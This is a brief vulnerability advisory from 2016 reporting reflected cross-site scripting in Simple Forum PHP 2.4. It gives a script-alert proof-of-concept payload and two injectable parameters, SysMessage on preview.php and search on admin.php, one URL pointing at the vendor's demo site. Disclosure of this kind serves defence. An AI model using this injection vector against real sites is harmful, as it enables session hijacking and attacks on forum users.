Simple Forum PHP version 2.4 suffers from a cross site scripting vulnerability.
46dcd3ce17c90ebde47c14a5a964ae574f1105e69d42a740ee493f2e91b4c93e
=====================================================
# Simple Forum PHP 2.4 - Reflected XSS
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable parameter : SysMessage
Mehod : GET
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url:
http://localhost/forum/preview.php?SysMessage=[payload]
Vulnerable parameter : search
Mehod : POST
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url:
http://simpleforumphp.com/forum/admin.php
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================